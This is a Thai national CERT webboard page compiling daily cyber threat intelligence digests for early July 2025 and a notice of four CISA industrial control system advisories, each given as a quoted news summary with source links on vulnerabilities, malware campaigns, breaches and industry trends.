NCSA Webboard
    Posts created by NCSA_THAICERT

    • CISA issues four industrial control systems advisories

      On 3 July 2025 (B.E. 2568), the Cybersecurity and Infrastructure Security Agency (CISA) released four advisories on industrial control systems (ICS). These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. They are as follows:

      • ICSA-25-184-01 Hitachi Energy Relion 670/650 and SAM600-IO Series
      • ICSA-25-184-02 Hitachi Energy MicroSCADA X SYS600
      • ICSA-25-184-03 Mitsubishi Electric MELSOFT Update Manager
      • ICSA-25-184-04 Mitsubishi Electric MELSEC iQ-F Series

      CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations. Further details are available at https://www.cisa.gov/news-events/alerts/2025/07/03/cisa-releases-four-industrial-control-systems-advisories

      References
      https://www.cisa.gov/news-events/alerts/2025/07/03/cisa-releases-four-industrial-control-systems-advisories
      You can follow the news on the webboard or on the NCSA Thailand Facebook page.

      Posted in OT Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 04 July 2025

      Healthcare Sector

      • Healthcare CISOs Must Secure More Than What’s Regulated
        "In this Help Net Security interview, Henry Jiang, CISO at Ensora Health, discusses what it really takes to make DevSecOps work in healthcare. He explains how balancing speed and security isn’t easy and why aligning with regulations is key. Jiang also shares tips on working with engineering teams and how automation helps in DevSecOps."
        https://www.helpnetsecurity.com/2025/07/03/henry-jiang-ensora-health-healthcare-devsecops-strategy/

      Industrial Sector

      • Industrial Security Is On Shaky Ground And Leaders Need To Pay Attention
        "44% of industrial organizations claim to have strong real-time cyber visibility, but nearly 60% have low to no confidence in their OT and IoT threat detection capabilities, according to Forescout. Digitalization has increased connectivity across devices, transforming industrial environments, which in turn increases cyber risk. Rising geopolitical tensions further compound these challenges, demanding more nuanced, strategic and integrated security approaches to protect critical assets while maintaining operations."
        https://www.helpnetsecurity.com/2025/07/03/ot-iot-threat-detection-confidence/
      • Hitachi Energy Relion 670/650 And SAM600-IO Series
        "An authenticated user with file access privilege via FTP access can cause the Relion 670/650 and SAM600-IO series device to reboot due to improper disk space management."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-01
      • Hitachi Energy MicroSCADA X SYS600
        "Successful exploitation of these vulnerabilities could allow an attacker to tamper with the system file, overwrite files, create a denial-of-service condition, or leak file content."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-02
      • Mitsubishi Electric MELSOFT Update Manager
        "Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code, disclose information, alter information, or cause a denial-of-service (DoS) condition."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-03
      • Mitsubishi Electric MELSEC iQ-F Series
        "Successful exploitation of this vulnerability could result in a denial-of-service condition for legitimate users for a certain period by repeatedly attempting to log in with incorrect passwords. When the product repeatedly receives unauthorized logins from an attacker, legitimate users will be unable to be authenticated until a certain period has passed after the lockout or until the product is reset."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-184-04
      • OT Security In Ports: Lessons From The Coast Guard's Latest Warning
        "The cranes that move goods in and out of America's busiest ports (some of the most essential components of our national logistics chain) are under growing scrutiny. In a newly issued MARSEC Directive 105-5, the U.S. Coast Guard has raised red flags about the cybersecurity risks that come with ship-to-shore (STS) cranes manufactured in China. These cranes, mostly produced by state-owned enterprises like Shanghai Zhenhua Heavy Industries (ZPMC), make up nearly 80% of the STS equipment at U.S. ports."
        https://www.tripwire.com/state-of-security/ot-security-ports-lessons-coast-guards-latest-warning

      New Tooling

      • GitPhish: Open-Source GitHub Device Code Flow Security Assessment Tool
        "GitPhish is an open-source security research tool built to replicate GitHub’s device code authentication flow. It features three core operating modes: an authentication server, automated landing page deployment, and an administrative management interface. GitPhish can be accessed via a command-line interface or a web dashboard, offering comprehensive features such as logging, analytics, and token management."
        https://www.helpnetsecurity.com/2025/07/03/gitphish-open-source-github-device-code-flow-security-assessment-tool/
        https://github.com/praetorian-inc/GitPhish

      Vulnerabilities

      • Grafana Releases Critical Security Update For Image Renderer Plugin
        "Grafana Labs has addressed four Chromium vulnerabilities in critical security updates for the Grafana Image Renderer plugin and Synthetic Monitoring Agent. Although the issues impact Chromium and were fixed by the open-source project two weeks ago, Grafana received a bug bounty submission from security researcher Alex Chapman proving their exploitability in the Grafana components. Grafana describes the update as a "critical severity security release" and advises users to apply the fixes for the vulnerabilities below as soon as possible:"
        https://www.bleepingcomputer.com/news/security/grafana-releases-critical-security-update-for-image-renderer-plugin/
      • Apache Under The Lens: Tomcat’s Partial PUT And Camel’s Header Hijack
        "In March 2025, Apache disclosed CVE-2025-24813, a vulnerability impacting Apache Tomcat. This is a widely used platform that allows Apache web servers to run Java-based web applications. The flaw allows remote code execution, affecting Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34 and 11.0.0-M1 to 11.0.2. The same month, Apache revealed two additional vulnerabilities in Apache Camel, a message routing middleware framework. These vulnerabilities are CVE-2025-27636 and CVE-2025-29891, two flaws that allow remote code execution, affecting Apache Camel versions 4.10.0 to 4.10.1, 4.8.0 to 4.8.4 and 3.10.0 to 3.22.3."
        https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/
      • Azure Machine Learning Escalation: When Pipelines Go Off The Rails
        "Orca has discovered a new privilege escalation vulnerability in the Azure Machine Learning service. We found that invoker scripts that are automatically created for each AML pipeline component and stored in a linked Storage Account can be abused to execute code with elevated privileges. While the severity varies based on the identity assigned to the compute instance, this enables multiple escalation paths when the instance runs under a highly privileged managed identity."
        https://orca.security/resources/blog/azure-machine-learning-privilege-escalation/
        https://www.infosecurity-magazine.com/news/privilege-escalation-flaw-azure-ml/

      Malware

      • Hunters International Ransomware Shuts Down, Releases Free Decryptors
        "The Hunters International Ransomware-as-a-Service (RaaS) operation announced today that it has officially closed down its operations and will offer free decryptors to help victims recover their data without paying a ransom. "After careful consideration and in light of recent developments, we have decided to close the Hunters International project. This decision was not made lightly, and we recognize the impact it has on the organizations we have interacted with," the cybercrime gang says in a statement published on its dark web leak earlier today. "As a gesture of goodwill and to assist those affected by our previous activities, we are offering free decryption software to all companies that have been impacted by our ransomware. Our goal is to ensure that you can recover your encrypted data without the burden of paying ransoms.""
        https://www.bleepingcomputer.com/news/security/hunters-international-ransomware-shuts-down-after-world-leaks-rebrand/
        https://therecord.media/hunters-international-ransomware-extortion-group-claims-shutdown
        https://www.bankinfosecurity.com/ransomware-group-hunters-international-announces-exit-a-28894
        https://www.theregister.com/2025/07/03/hunters_international_shutdown/
      • The SOC Case Files: XDR Contains Two Nearly Identical Attacks Leveraging ScreenConnect
        "Barracuda’s Managed XDR team recently helped two companies mitigate incidents where attackers had managed to compromise computers and install rogue ScreenConnect remote management software. The incidents were neutralized before the attackers were able to move laterally through the network."
        https://blog.barracuda.com/2025/07/02/soc-case-files-xdr-contains-two-attacks-screenconnect
      • RondoDox Unveiled: Breaking Down a New Botnet Threat
        "Over the past month, FortiGuard Labs has observed a significant increase in scanning activity, including a new botnet campaign that exploits two high-risk vulnerabilities: CVE-2024-3721 and CVE-2024-12856. Both have been publicly disclosed and are actively being targeted, posing serious risks to device security and overall network integrity."
        https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
      • Satori Threat Intelligence Alert: IconAds Conceals Source Of Ad Fraud From Users
        "HUMAN’s Satori Threat Intelligence and Research Team has uncovered and disrupted an operation dubbed IconAds. This scheme centered on a collection of 352 apps which load out-of-context ads on a user’s screen and hide the app icons, making it difficult for a user to identify the culprit app and remove it. At its peak, IconAds accounted for 1.2 billion bid requests a day."
        https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-iconads/
        https://thehackernews.com/2025/07/mobile-security-alert-352-iconads-fraud.html
      • Two New Pro-Russian Hacktivist Groups Target Ukraine, Recruit Insiders
        "Two new pro-Russian hacktivist groups have emerged in recent months to mount cyberattacks on Ukraine and its allies. The groups, calling themselves IT Army of Russia and TwoNet, use the Telegram messaging app to coordinate operations, recruit insiders and collect information about targets in Ukraine, according to a new report by cybersecurity firm Intel 471. Researchers said both groups appeared earlier this year and may be rebrands of previously known threat actors, though their exact links to past campaigns remain unclear."
        https://therecord.media/twonet-it-army-of-russia-new-hacktivist-groups-target-ukraine

      Breaches/Hacks/Leaks

      • IdeaLab Confirms Data Stolen In Ransomware Attack Last Year
        "IdeaLab is notifying individuals impacted by a data breach incident last October when hackers accessed sensitive information. Although the organization does not describe the type of attack, the Hunters International ransomware group has claimed the breach and leaked the stolen data on the dark web. IdeaLab is a California-based technology startup incubator that since 1996 has launched over 150 companies, including GoTo.com, CitySearch, eToys, Authy, Pet.net, Heliogen, and Energy Vault."
        https://www.bleepingcomputer.com/news/security/idealab-confirms-data-stolen-in-ransomware-attack-last-year/
      • Taking Over 60k Spyware User Accounts With SQL Injection
        "Recently I was looking through a database of known stalkerware services and found one I wasn’t familiar with: Catwatchful. It seemed to be a full-featured Android spy app, to actually be its own service as opposed to a millionth FlexiSpy reseller, and to offer a 3-day free trial. Aside from a boilerplate disclaimer to only use it with consent, it also pretty brazenly advertised itself as stalkerware in the FAQ:"
        https://ericdaigle.ca/posts/taking-over-60k-spyware-user-accounts/
        https://www.securityweek.com/undetectable-android-spyware-backfires-leaks-62000-user-logins/
        https://www.malwarebytes.com/blog/news/2025/07/catwatchful-child-monitoring-app-exposes-victims-data
      • Cybercriminals Target Brazil: 248,725 Exposed In CIEE One Data Breach
        "Yesterday, July 1, 2025 — the actor under the alias "888" published over 248,725 records containing sensitive PII stolen from CIEE (Centro de Integração Empresa-Escola). ONE CIEE is a personalized recruitment and selection service offered by CIEE Centro de Integração Empresa-Escola (Business-School Integration Center) for companies seeking candidates for internships and apprenticeship programs. It connects specialists and businesses, ranging from major international corporations to local entities in Brazil."
        https://www.resecurity.com/blog/article/cybercriminals-target-brazil-248725-exposed-in-ciee-one-data-breach
        https://securityaffairs.com/179609/data-breach/cybercriminals-target-brazil-248725-exposed-in-ciee-one-data-breach.html
      • Virginia County Says April Ransomware Attack Exposed Employee SSNs
        "Government employees working for the county of Gloucester in Virginia had Social Security numbers and other sensitive data stolen during a ransomware attack in April. The county sent 3,527 current and former employees notices this week warning that their personal information was accessed by hackers who breached county systems on April 22. In addition to Social Security numbers, names, driver’s license numbers, bank account information, health insurance numbers and medical information was also stolen during the incident."
        https://therecord.media/virginia-county-says-ransomware-attack-exposed-ssns
      • Young Consulting Finds Even More Folks Affected In Breach Mess – Now Over 1 Million
        "Young Consulting's cybersecurity woes continue after the number of affected individuals from last year's suspected ransomware raid passed the 1 million mark. The software vendor to stop-loss insurance carriers, now trading as Connexure, said the attack took place sometime between April 10 and 13, 2024, in a data breach notice that remains on its website homepage today. Young Consulting did not mention that ransomware was involved, although the BlackSuit group took credit for the attack, which was also widely reported as a ransomware incident."
        https://www.theregister.com/2025/07/03/young_consulting_breach_million/

      General News

      • Cyberattacks Are Draining Millions From The Hospitality Industry
        "Every day, millions of travelers share sensitive information like passports, credit card numbers, and personal details with hotels, restaurants, and travel services. This puts pressure on the hospitality sector to keep that information safe and private. The industry itself is booming. The hotel segment alone is expected to reach a new peak of $511.91 billion in 2029. It’s no surprise that cybercriminals are taking notice."
        https://www.helpnetsecurity.com/2025/07/03/hospitality-industry-cybersecurity-challenges/
      • AI Tools Are Everywhere, And Most Are Off Your Radar
        "80% of AI tools used by employees go unmanaged by IT or security teams, according to Zluri’s The State of AI in the Workplace 2025 report. AI is popping up all over the workplace, often without anyone noticing. If you’re a CISO, if you want to avoid blind spots and data risks, you need to know where AI is showing up and what it’s doing across the entire organization."
        https://www.helpnetsecurity.com/2025/07/03/shadow-ai-tools-workplace/
      • 90% Aren’t Ready For AI Attacks, Are You?
        "As AI reshapes business, 90% of organizations are not adequately prepared to secure their AI-driven future, according to a new report from Accenture. Globally, 63% of companies are in the “Exposed Zone,” indicating they lack both a cohesive cybersecurity strategy and necessary technical capabilities. The report reveals AI adoption has accelerated the speed, scale and sophistication of cyber threats, far outpacing current enterprise cyber defenses. For example, 77% of organizations lack the essential data and AI security practices needed to protect critical business models, data pipelines and cloud infrastructure."
        https://www.helpnetsecurity.com/2025/07/03/ai-cyber-defenses/
      • Police Dismantles Investment Fraud Ring Stealing €10 Million
        "The Spanish police have dismantled a large-scale investment fraud operation that caused cumulative damages exceeding $11.8 million (€10 million). During simultaneous raids in Barcelona, Madrid, Mallorca, and Alicante, coordinated by the Mossos d’Esquadra, Civil Guard, and the National Police, 21 individuals were arrested. Along with the arrests, the police agents also confiscated seven luxury vehicles and more than $1.5 million (€1.3 million) in cash and cryptocurrency."
        https://www.bleepingcomputer.com/news/legal/police-dismantles-investment-fraud-ring-stealing-10-million/
      • Amazon Prime Day 2025: Deals Await, But So Do The Cyber Criminals
        "Ahead of this year’s Amazon Prime Day 2025 on July 8th, shoppers worldwide are preparing their wish lists. So are cyber criminals. Phishing attacks are already targeting innocent shoppers. In June alone, over 1,000 new domains with names resembling Amazon appeared online. Alarmingly, 87% of these have already been flagged as malicious or suspicious. Many of the domains include the term “Amazon Prime”, with one in every 81 of the risky domains containing this phrase."
        https://blog.checkpoint.com/research/amazon-prime-day-2025-deals-await-but-so-do-the-cyber-criminals-2/
      • New Cyber Blueprint Aims To Guide Organizations On AI Journey
        "Executive leadership is pushing for rapid artificial intelligence (AI) adoption inside their organizations to offset cyber-workforce shortages or to enhance threat detection and incident response capabilities, but lack of preparation can introduce problems. To address the issue, Deloitte has published a new Cyber AI blueprint to provide organizations with a template for how to design, build, and deploy AI tools. The blueprint consists of an AI operating model, a governance model, and a reference architecture to help organizations design and operate an AI-powered environment, including agentic AI applications. The blueprint also includes elements to help organizations update the workforce's skills to handle the changes posed by the new AI-enhanced environment."
        https://www.darkreading.com/cyber-risk/cyber-blueprint-guide-ai-journey
      • Criminals Sending QR Codes In Phishing, Malware Campaigns
        "That email advertising a great deal on an inflatable pool to cool off with during this sweltering July may come with a nifty QR code to simplify the buying process. Or you find a QR code touting a special sale on fireworks for the holiday weekend. These QR codes look harmless, but attackers are increasingly using them for malicious purposes. In an analysis of phishing and other malicious activities associated with identity theft between October 2024 and March 2025, the Anti-Phishing Working Group (APWG) found that criminals are sending millions of emails each day containing QR codes that lead victims to phishing sites, brand impersonation pages, and other fraudulent scam sites. Over this six-month period, email security company and APWG member Mimecast detected 1.7 million malicious QR codes and an average of 2.7 million emails with QR codes attached daily, according to APWG's "Phishing Activity Trends Report.""
        https://www.darkreading.com/endpoint-security/criminals-send-qr-codes-phishing
      • Dark Web Vendors Shift To Third Parties, Supply Chains
        "Cyberattackers continue to attack a variety of technology supply chains — from open source software components to managed service providers — and increasingly, they are advertising their windfalls on Dark Web forums. In March, for example, a threat actor posted details of an alleged compromise of Oracle Cloud to the BreachForums Dark Web site. The compromise — initially denied by Oracle — led to Oracle later notifying customers of a breach of two servers containing usernames and passwords. The hacker who originally posted information of the attack, "rose87169," had published some information in the hope of attracting collaborators to decrypt some of the data."
        https://www.darkreading.com/threat-intelligence/dark-web-vendors-third-parties-supply-chains
      • AI Tackles Binary Code Challenges To Fortify Supply Chain Security
        "Artificial intelligence (AI) can help improve binary code analysis and, in turn, make the software supply chain more secure. Effective binary code analysis is paramount as supply chain risks rise. Vendor and government-backed initiatives introduced over the past two years, such as the Cybersecurity and Infrastructure Security Agency's Secure by Design pledge, accentuate how pervasive software supply chain security threats have grown. It's a result of how digitally interconnected organizations have become. However, it's difficult to account for every link in the chain — some prioritize security, while others exhibit dangerous shortcomings."
        https://www.darkreading.com/application-security/ai-tackles-binary-code-challenges-fortify-supply-chain-security
      • Browser Extensions Pose Heightened, But Manageable, Security Risks
        "While browser extensions add useful functionality to Web browsers, such as blocking ads, managing passwords, and taking notes, they also increase the organization's security and privacy risks. Browser extensions require certain levels of permissions that are attractive to attackers. Some extensions need access to the user's location, browsing history, or the user's clipboard to see what data the user has copied. Some extensions go further, requesting access to nearly all of the data stored on the user's computer as well as the data accessed while visiting different websites. Attackers can exploit extensions with these heightened permissions to access potentially sensitive information, such as Web traffic, saved credentials, and session cookies."
        https://www.darkreading.com/cyber-risk/browser-extensions-heightened-manageable-security-risks
      • CVE Program Launches Two New Forums To Enhance CVE Utilization
        "The Board of the Common Vulnerabilities and Exposures (CVE) Program has launched two new forums to encourage more contributions and shape the future of the initiative. The CVE Program, run by the nonprofit MITRE and sponsored by the US Cybersecurity and Infrastructure Security Agency (CISA), faced uncertainty about its future in April after its contract expired. The contract was subsequently extended for 11 months, according to reports. While the longer-term future of the program remains uncertain beyond this period, the CVE Board appears to be willing to allow more stakeholders to have a voice and shape the program’s strategy."
        https://www.infosecurity-magazine.com/news/cve-program-new-user-researcher/
      • INTERPOL Releases New Information On Globalization Of Scam Centres
        "Human trafficking-fueled scam centres have expanded their global footprint, according to a new crime trend update released by INTERPOL. As of March 2025, victims from 66 countries were trafficked into online scam centres, with no continent left untouched. Seventy-four percent of human trafficking victims were brought to centres in the original ‘hub’ region of Southeast Asia, according to analysis of the crime trend using data from relevant INTERPOL Notices issued in the past five years."
        https://www.interpol.int/en/News-and-Events/News/2025/INTERPOL-releases-new-information-on-globalization-of-scam-centres
        https://therecord.media/interpol-west-africa-cybercrime-compounds
      • Russia Jails Man For 16 Years Over Pro-Ukraine Cyberattacks On Critical Infrastructure
        "A Russian court has sentenced a man to 16 years in a high-security penal colony for launching cyberattacks that disrupted critical infrastructure, authorities said on Wednesday. Andrei Smirnov, a resident of the Siberian city of Belovo, was detained in October 2023 and charged with treason. Prosecutors said he held pro-Ukrainian views and joined a hacker group allegedly acting in the interests of Ukrainian intelligence. According to their investigation, Smirnov used malware to attack Russian information systems in 2022, blocking access to websites of several local companies and damaging critical infrastructure. Russian authorities did not specify which infrastructure or companies were affected."
        https://therecord.media/russia-jails-man-over-pro-ukraine-cyberattacks
      • Ransomware And Cyber Extortion In Q2 2025
        "The decline of legacy ransomware groups has created a vacuum that’s quickly been filled by emerging groups like “Qilin.” Nonetheless, this quarter still saw a 31% decrease in named victims compared to the previous quarter. Leading ransomware-as-a-service (RaaS) groups like Qilin and “Akira” rely on the mass exploitation of vulnerabilities to compromise organizations with speed and precision. Future ransomware leaders are likely to succeed by combining automated discovery tools with public proof-of-concept (POC) exploits, accelerating compromises and propelling them to the forefront of the ransomware race. To counter these threats, organizations must prioritize asset discovery and implement a strict patch management framework to ensure exposed and critical devices cannot be exploited by ransomware actors."
        https://reliaquest.com/blog/ransomware-cyber-extortion-threat-intel-q2-2025/
        https://www.infosecurity-magazine.com/news/automation-vulnerability/

      References
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 03 July 2025

      Financial Sector

      • How FinTechs Are Turning GRC Into a Strategic Enabler
        "In this Help Net Security interview, Alexander Clemm, Corp GRC Lead, Group CISO, and BCO at Riverty, shares how the GRC landscape for FinTechs has matured in response to tighter regulations and global growth. He discusses the impact of frameworks like DORA and the EU AI Act, and reflects on building a culture where compliance supports, rather than slows, business progress."
        https://www.helpnetsecurity.com/2025/07/02/alexander-clemm-riverty-fintechs-grc-landscape/

      New Tooling

      • Secretless Broker: Open-Source Tool Connects Apps Securely Without Passwords Or Keys
        "Secretless Broker is an open-source connection broker that eliminates the need for client applications to manage secrets when accessing target services like databases, web services, SSH endpoints, or other TCP-based systems."
        https://www.helpnetsecurity.com/2025/07/02/secretless-broker-open-source-tool-connects-apps-securely/
        https://github.com/cyberark/secretless-broker

      Vulnerabilities

      • Cisco Warns That Unified CM Has Hardcoded Root SSH Credentials
        "Cisco has removed a backdoor account from its Unified Communications Manager (Unified CM), which would have allowed remote attackers to log in to unpatched devices with root privileges. Cisco Unified Communications Manager (CUCM), formerly known as Cisco CallManager, serves as the central control system for Cisco's IP telephony systems, handling call routing, device management, and telephony features. The vulnerability (tracked as CVE-2025-20309) was rated as maximum severity, and it is caused by static user credentials for the root account, which were intended for use during development and testing."
        https://www.bleepingcomputer.com/news/security/cisco-removes-unified-cm-callManager-backdoor-root-account/
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssh-m4UBdpE7
        https://securityaffairs.com/179577/security/cisco-removed-the-backdoor-account-from-its-unified-communications-manager.html
        https://www.theregister.com/2025/07/02/cisco_patch_cvss/
      • 600,000 WordPress Sites Affected By Arbitrary File Deletion Vulnerability In Forminator WordPress Plugin
        "On June 20th, 2025, we received a submission for an Arbitrary File Deletion vulnerability in Forminator, a WordPress plugin with more than 600,000 active installations. This vulnerability makes it possible for unauthenticated threat actors to specify arbitrary file paths in a form submission, and the file will be deleted when the submission is deleted. It can be leveraged to delete critical files like wp-config.php, which can lead to remote code execution. Props to Phat RiO – BlueRock who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This researcher earned a bounty of $8,100.00 for this discovery, the top bounty awarded through our program so far."
        https://www.wordfence.com/blog/2025/07/600000-wordpress-sites-affected-by-arbitrary-file-deletion-vulnerability-in-forminator-wordpress-plugin/
        https://www.bleepingcomputer.com/news/security/forminator-plugin-flaw-exposes-wordpress-sites-to-takeover-attacks/
        https://www.securityweek.com/forminator-wordpress-plugin-vulnerability-exposes-400000-websites-to-takeover/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-6554 Google Chromium V8 Type Confusion Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/07/02/cisa-adds-one-known-exploited-vulnerability-catalog

      Malware

      • Analysis Of Attacks Targeting Linux SSH Servers For Proxy Installation
        "AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting Linux servers that are inappropriately managed using honeypots. One of the representative honeypots is the SSH service that uses weak credentials, which is targeted by a large number of DDoS and coinminer attackers. ASEC has identified cases where Linux servers were attacked to install proxies. In each case, TinyProxy or Sing-box was installed. No other attack logs were found except for the installation of TinyProxy or Sing-box. It appears that the attackers aim to use the infected systems as proxy nodes."
        https://asec.ahnlab.com/en/88749/
      • DCRAT Impersonating The Colombian Government
        "The FortiMail IR team recently uncovered a new email attack distributing a Remote Access Trojan called DCRAT. The threat actor is impersonating a Colombian government entity to target organizations in Colombia. The threat actor uses multiple techniques, such as a password protected archive, obfuscation, steganography, base64 encoding, and multiple file drops, to evade detection."
        https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government
      • June's Dark Gift: The Rise Of Qwizzserial
        "Discovered by Group-IB in mid-2024, the Qwizzserial, which was initially not very active, began to spread strongly in Uzbekistan, masquerading as legitimate applications. The malware steals banking information and intercepts 2FA sms, transmitting it to fraudsters via Telegram bots."
        https://www.group-ib.com/blog/rise-of-qwizzserial/
        https://www.infosecurity-magazine.com/news/android-sms-stealer-100000/
      • Okta Observes v0 AI Tool Used To Build Phishing Sites
        "Okta Threat Intelligence has observed threat actors abusing v0, a breakthrough Generative Artificial Intelligence (GenAI) tool created by Vercel, to develop phishing sites that impersonate legitimate sign-in webpages. This observation signals a new evolution in the weaponization of Generative AI by threat actors who have demonstrated an ability to generate a functional phishing site from simple text prompts. Okta researchers were able to reproduce our observations."
        https://www.okta.com/newsroom/articles/okta-observes-v0-ai-tool-used-to-build-phishing-sites/
        https://thehackernews.com/2025/07/vercels-v0-ai-tool-weaponized-by.html
      • MacOS NimDoor | DPRK Threat Actors Target Web3 And Crypto Platforms With Nim-Based Malware
        "In April 2025, Huntabil.IT observed a targeted attack on a Web3 startup, attributing the incident to a DPRK threat actor group. Several reports on social media at the time described similar incidents at other Web3 and Crypto organizations. Analysis revealed an attack chain consisting of an eclectic mix of scripts and binaries written in AppleScript, C++ and Nim. Although the early stages of the attack follow a familiar DPRK pattern using social engineering, lure scripts and fake updates, the use of Nim-compiled binaries on macOS is a more unusual choice. A report by Huntress in mid-June described a similar initial attack chain as observed by Huntabil.IT, albeit using different later stage payloads."
        https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/
        https://www.bleepingcomputer.com/news/security/nimdoor-crypto-theft-macos-malware-revives-itself-when-killed/
        https://thehackernews.com/2025/07/north-korean-hackers-target-web3-with.html
      • FoxyWallet: 40+ Malicious Firefox Extensions Exposed
        "A large-scale malicious campaign has been uncovered involving dozens of fake Firefox extensions designed to steal cryptocurrency wallet credentials. These extensions impersonate legitimate wallet tools from widely-used platforms such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox. Once installed, the malicious extensions silently exfiltrate wallet secrets, putting users’ assets at immediate risk. So far, we were able to link over 40 different extensions to this campaign, which is still ongoing and very much alive — some extensions are still available on the marketplace. The linkage was done through a meticulous effort of discovering shared TTPs and infrastructure."
        https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
        https://www.bleepingcomputer.com/news/security/dozens-of-fake-wallet-add-ons-flood-firefox-store-to-drain-crypto/
      • French Cybersecurity Agency Confirms Government Affected By Ivanti Hacks
        "France’s cybersecurity agency reported on Tuesday that a range of government, utility and private sector entities in the country were impacted by a hacking campaign last year exploiting multiple zero-day vulnerabilities in an Ivanti appliance. The campaign, which had prompted a warning in September by U.S. cybersecurity authorities, targeted the Ivanti Cloud Service Appliance — a bit of software that connects on-premise networks with cloud-based services. In France, the hacking campaign targeted “organizations from governmental, telecommunications, media, finance, and transport sectors,” stated the report from ANSSI — the Agence Nationale de la Sécurité des Systèmes d’Information (the National Agency for the Security of Information Systems) — exploiting bugs tracked as CVE-2024-8190, CVE-2024-8963, and CVE-2024-9380."
        https://therecord.media/france-anssi-report-ivanti-bugs-exploited
        https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-009.pdf
        https://www.darkreading.com/cyber-risk/initial-access-broker-self-patches-zero-days
        https://www.bankinfosecurity.com/chinese-hackers-exploited-ivanti-flaw-in-france-a-28888
        https://www.infosecurity-magazine.com/news/chinese-hackers-france-ivanti/
      • PDFs: Portable Documents, Or Perfect Deliveries For Phish?
        "The portable document format (PDF) is a standard method for sharing information electronically. Files created in other applications (e.g., Microsoft Word) are often converted into this format, which can then be viewed using PDF rendering applications like Adobe Reader, commonly available on most OSs. Thanks to its excellent portability, this file format is widely used for the mass distribution of documents to large audiences. However, in recent months, it has also been exploited for illegitimate purposes, such as brand impersonation."
        https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/
        https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
      • Jasper Sleet: North Korean Remote IT Workers’ Evolving Tactics To Infiltrate Organizations
        "Since 2024, Microsoft Threat Intelligence has observed remote information technology (IT) workers deployed by North Korea leveraging AI to improve the scale and sophistication of their operations, steal data, and generate revenue for the Democratic People’s Republic of Korea (DPRK). Among the changes noted in the North Korean remote IT worker tactics, techniques, and procedures (TTPs) is the use of AI tools to replace images in stolen employment and identity documents and enhance North Korean IT worker photos to make them appear more professional. We’ve also observed that they’ve been utilizing voice-changing software."
        https://www.microsoft.com/en-us/security/blog/2025/06/30/jasper-sleet-north-korean-remote-it-workers-evolving-tactics-to-infiltrate-organizations/
        https://www.darkreading.com/cyberattacks-data-breaches/scope-scale-spurious-north-korean-it-workers
      • Silent Push Uncovers Chinese Fake Marketplace e-Commerce Phishing Campaign Using Thousands Of Websites To Spoof Popular Retail Brands
        "From a lead gained through a recent X/Twitter post by Mexican journalist Ignacio Gómez Villaseñor, Silent Push Threat Analysts have been investigating a new phishing e-commerce website scam campaign. The original campaign observed was targeting Spanish-language visitors shopping for the “Hot Sale 2025.” The research by Gómez Villaseñor focused on specific domains found on one IP address targeting Spanish-language audiences; however, it was but one slice of a much larger campaign."
        https://www.silentpush.com/blog/fake-marketplace/
        https://therecord.media/china-linked-hackers-website-phishing
      • Cl0p Cybercrime Gang's Data Exfiltration Tool Found Vulnerable To RCE Attacks
        "Security experts have uncovered a hole in Cl0p's data exfiltration tool that could potentially leave the cybercrime group vulnerable to attack. The vulnerability in the Python-based software, which was used in the 2023-2024 MOVEit mass data raids, was discovered by Italian researcher Lorenzo N and published by the Computer Incident Response Center Luxembourg (CIRCL). Classed as an improper input validation (CWE-20) bug, the flaw with an 8.9 severity score is underpinned by a lack of input sanitization, which results in the tool constructing OS commands by concatenating attacker-supplied strings."
        https://www.theregister.com/2025/07/02/cl0p_rce_vulnerability/
        https://vulnerability.circl.lu/vuln/gcve-1-2025-0002
      • Windows Shortcut (LNK) Malware Strategies
        "Attackers are increasingly exploiting Windows shortcut (LNK) files for malware delivery. Our telemetry revealed 21,098 malicious LNK samples in 2023, which surged to 68,392 in 2024. In this article, we present an in-depth investigation of LNK malware, based on analysis of 30,000 recent samples. Windows shortcut files use the .lnk file extension and function as a virtual link that allows people to easily access other files without having to navigate through multiple folders on a Windows host. The flexibility of LNK files makes them a powerful tool for attackers, as they can both execute malicious content and masquerade as legitimate files to deceive victims into unintentionally launching malware."
        https://unit42.paloaltonetworks.com/lnk-malware/
      • ESET Research: Russia’s Gamaredon APT Group Unleashed Spearphishing Campaigns Against Ukraine With An Evolved Toolset
        "ESET Research has released a white paper about Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed across the previous year. Gamaredon, attributed by the Security Service of Ukraine (SSU) to the 18th Center of Information Security of Russia’s Federal Security Service (FSB), has targeted Ukrainian governmental institutions since at least 2013. In 2024, Gamaredon exclusively attacked Ukrainian institutions. ESET’s latest research shows that the group remains highly active, consistently targeting Ukraine, but has notably adapted its tactics and tools. The group’s objective is cyberespionage aligned with Russian geopolitical interests. Last year, the group significantly increased the scale and frequency of spearphishing campaigns, employing new delivery methods, and one attack payload was used solely to spread Russian propaganda."
